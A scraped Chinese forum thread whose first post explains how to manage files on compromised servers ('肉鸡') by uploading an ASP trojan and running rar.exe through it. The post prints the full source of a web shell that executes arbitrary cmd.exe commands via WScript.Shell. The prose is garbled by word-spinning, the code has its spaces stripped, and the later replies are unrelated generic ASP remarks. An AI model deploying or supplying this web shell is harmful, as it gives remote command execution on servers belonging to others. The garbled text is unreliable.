仓酷云

标题: ASP编程:用ASP木马完成FTP息争紧缩 [打印本页]

作者: 金色的骷髅    时间: 2015-1-16 23:15
标题: ASP编程:用ASP木马完成FTP息争紧缩
帮助用户快速实现各种应用服务,ASP商有整合各方面资源的能力,可在短期内为用户提供所需的解决方案。例如,典型的ERP安装,如果要在客户端安装的话需要半年到二年的时间,但是美国的一些ASP商如USI和CORIO能在90—120天内提供ERP应用方案。木马|紧缩我想人人都有一些开了80端口的肉鸡吧,假如是国际的出于平安就不要往下看了,假如不无妨往下看一下,小弟献丑了,以求举一反三.
<P>在肉鸡上放网站最贫苦的大概就是更新和上传大批的文件了,终端服务明白天简单被发明,本人开个ftp又不宁神.本人在网上转了一圈发明经由过程分离无组件上传和asp木马能够轻松完成.

  asp木马人人都很熟习,不过就是一个cmd,有甚么感化啊,你别急,听我渐渐说嘛.全体思绪就是先经由过程ftp,139,大概winshell上传一个无组件asp程序.我选择了化境的webedit(实在这个已不是一个纯真的无组件上传的工具了,经由过程它还能够修正,删除文件/目次,能够用来更新页面喔,作起来告白了,我跟他没亲戚啊,闪过一个flyingbottle..持续)和一个asp木马(假如,其实懒得找.最初带着源码,粘贴另存为asp文件便可),记着可都要在肉鸡的web目次喔.实在年夜多的成绩webedit都能够办理,不外假如有良多文件一个一个上传可就贫苦了,怎样办?这下asp木马用上了.找一个rar.exe(一切装过了winrar的目次都有,说不定肉鸡上已安好了,假如是其余命令行的解紧缩工具也能够喔)把它拷到%SystemRoot%system32下.上传.zip大概.rar文件到该肉鸡的web目次.在扫瞄器地点栏里翻开asp木马(临时称之为trojan.asp),在text文本框里输出rar-xsource.rarpath解紧缩乐成,V,且慢怎样失掉web目次的相对路径(path)呢?我用的是用土办法,修正trojan.asp到场一行转换假造目次成相对路径并输入的语句<%=server.mappath(".")%>,"."能够随便改成任何的绝对假造目次.

  只是供应一个思绪,假如哪一个牛人可写一个asp的解紧缩那更好喽,不外?谁会呢,我不会,你会吗?至于怎样埋没假造目次,撑持简体中文显现等就不是该篇的会商之列了,老话,平安第一,一样平常放个小的论坛或谈天室就能够了,假如真放个团体主页,还把本人的接洽地点,德律风号码也留给人家就不太好了.ps.junesun倡议间接作成自解压,不知会不会弹出对话框。

  --------以下是asp木马的源码,倡议在<html>后加上<%=server.mappath(".")%>------------------------------

<%@Language=VBScript%>
<%
 DimoScript
 DimoScriptNet
 DimoFileSys,oFile
 DimszCMD,szTempFile<P> OnErrorResumeNext
 <<P>  --createtheCOMobjectsthatwewillbeusing--
  SetoScript=Server.createObject("WSCRIPT.SHELL")
  SetoScriptNet=Server.createObject("WSCRIPT.NETWORK")
  SetoFileSys=Server.createObject("Scripting.FileSystemObject")<<P>  --checkforacommandthatwehaveposted--
  szCMD=Request.form(".CMD")
  If(szCMD<>"")Then<<P>   --Useapoormanspipe...atempfile--
   szTempFile="C:"&oFileSys.GetTempName()
   CalloScript.Run("cmd.exe/c"&szCMD&">"&szTempFile,0,True)
   SetoFile=oFileSys.OpenTextFile(szTempFile,1,False,0)<  EndIf<%>
<HTML>
<BODY>
 <formaction="<%=Request.ServerVariables("URL")%>"method="POST">
  <inputtype=textname=".CMD"size=45value="<%=szCMD%>">
  <inputtype=submitvalue="Run">
 </form>
<PRE>< <%
  If(IsObject(oFile))Then
   --Readtheoutputfromourcommandandremovethetempfile--
   OnErrorResumeNext
   Response.WriteServer.HTMLEncode(oFile.ReadAll)
   oFile.Close
   CalloFileSys.deleteFile(szTempFile,True)
  EndIf
 %>
</BODY>
</HTML>



缺点:安全性不是太差了,还行,只要你充分利用系统自带的工具;唯一缺点就是执行效率慢,如何进行网站优化以后,效果会比较好。
作者: 爱飞    时间: 2015-1-20 08:41
学习是为了用的,是为了让你的程序产生价值,把握住这个原则会比较轻松点。除此之外,课外时间一定要多参加一些社会实践活动,来锻炼自己的能力。
作者: 莫相离    时间: 2015-1-23 15:19
还有如何才能在最短的时间内学完?我每天可以有效学习2小时,双休日4小时。
作者: 第二个灵魂    时间: 2015-1-27 07:49
我就感觉到ASP和一些常用的数据库编程以及软件工程方面的思想是非常重要的。我现在也在尝试自己做网页,这其中就用到了ASP,我想它的作用是可想而知的。
作者: 不帅    时间: 2015-1-31 06:51
如何学好ASP,以前也有人问过,把回答给你转过来看看能否对你有帮助:
作者: 乐观    时间: 2015-2-6 18:04
代码逻辑混乱,难于管理:由于ASP是脚本语言混合html编程,所以你很难看清代码的逻辑关系,并且随着程序的复杂性增加,使得代码的管理十分困难,甚至超出一个程序员所能达到的管理能力,从而造成出错或这样那样的问题。
作者: 灵魂腐蚀    时间: 2015-2-17 23:38
用户端的浏览器不需要提供任何别的支持,这样大提高了用户与服务器之间的交互的速度。
作者: 小女巫    时间: 2015-3-5 23:35
Request:从字面上讲就是“请求”,因此这个是处理客户端提交的东东的,例如Resuest.Form,Request.QueryString,或者干脆Request("变量名")
作者: 小妖女    时间: 2015-3-12 16:36
以上是语言本身的弱点,在功能方面ASP同样存在问题,第一是功能太弱,一些底层操作只能通过组件来完成,在这点上是远远比不上PHP/JSP,其次就是缺乏完善的纠错/调试功能,这点上ASP/PHP/JSP差不多。
作者: 若天明    时间: 2015-3-20 00:21
他的语法和设计思路和VB完全相同,导致很多ASP的书都留一句“相关内容请参考VB的相关教材....”更糟糕的是,相当多的ASP教程混合了Javascript,VBscript等等脚本语言,搞的初学者。




欢迎光临 仓酷云 (http://ckuyun.com/) Powered by Discuz! X3.2